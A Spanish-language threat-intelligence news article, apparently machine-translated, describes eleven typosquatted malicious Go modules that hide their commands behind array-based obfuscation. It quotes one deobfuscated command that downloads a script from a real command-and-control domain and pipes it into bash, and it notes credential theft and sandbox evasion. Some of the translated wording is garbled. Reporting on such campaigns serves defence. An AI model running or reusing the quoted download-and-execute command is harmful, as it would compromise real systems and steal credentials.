Los investigadores de ciberseguridad han descubierto una sofisticada campaña de malware que se dirige al ecosistema GO a través de once paquetes maliciosos que emplean técnicas de ofuscación avanzadas para ofrecer cargas útiles de segunda etapa.
La campaña demuestra una evolución preocupante en los ataques de la cadena de suministro, aprovechando la naturaleza descentralizada del sistema de módulos de GO para distribuir un código malicioso que pueda comprometer los servidores de construcción de Linux y las estaciones de trabajo de Windows.
Los paquetes maliciosos utilizan rutinas idénticas de ofuscación de cadenas basadas en índices que ocultan su verdadera funcionalidad de las herramientas de análisis estático.
En tiempo de ejecución, el código genera en silencio las conchas del sistema y recupera cargas útiles ejecutables de los servidores de comando y control alojados en dominios .icu y .tech intercambiables.
Lo más preocupante es que diez de estos paquetes permanecen activos en el registro del módulo GO, proporcionando a los actores de amenaza acceso persistente a cualquier entorno de desarrollo que los importe.
Paquete MCP-go original y benigno (fuente-Socket.dev)
Socket.dev analistas identificado Que ocho de los once paquetes son sofisticados tiposquios de módulos GO legítimos, cuidadosamente diseñados para parecer confiables para los desarrolladores que realizan búsquedas de dependencia de rutina.
Los investigadores descubrieron que seis de las diez URL maliciosas siguen siendo accesibles, lo que indica una amenaza activa y continua para la comunidad de desarrollo de software.
El sistema de gestión de paquetes descentralizado del vector de ataque de ataque, donde los módulos se importan directamente de los repositorios de GitHub en lugar de a través de registros centralizados como NPM o PYPI.
Esto crea una confusión en el espacio de nombres que los atacantes explotan al crear módulos con nombre de manera similar con diferentes mantenedores, lo que hace que sea difícil para los desarrolladores distinguir los paquetes legítimos de los impostores maliciosos.
Mecanismo de entrega de ofuscación y carga útil
El malware emplea una técnica de ofuscación consistente en todos los paquetes, utilizando decodificadores impulsados por la matriz para reconstruir comandos maliciosos en tiempo de ejecución.
El código ofuscado sigue un patrón predecible, estableciendo matrices de cadenas y llamando a diferentes índices para construir comandos del sistema que descargan y ejecutan cargas remotas.
Por ejemplo, el paquete github.com/expertsandba/opt contiene un código ofuscado que, cuando se desobfusca, se ejecuta:/bin/sh -c wget -o -https: // monsoletter (.) Icu/almacenamiento/de373d0d0df/a31546bf | /bin/bash &.
Paquete Malicioso MCP-GO (fuente-Socket.dev)
Este comando descarga un script bash directamente en la memoria y lo ejecuta en segundo plano sin escribir en el disco, lo que permite la entrega de carga útil sigilosa.
Las cargas útiles de la segunda etapa demuestran técnicas de evasión sofisticadas, implementando un retraso de sueño de una hora para eludir los sistemas de análisis de sandbox.
Una vez activado, el malware enumera la información del sistema, cosecha las credenciales del navegador y establece el acceso persistente de puerta trasera a través de la balanza de red continua a la infraestructura de comando y control externo.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
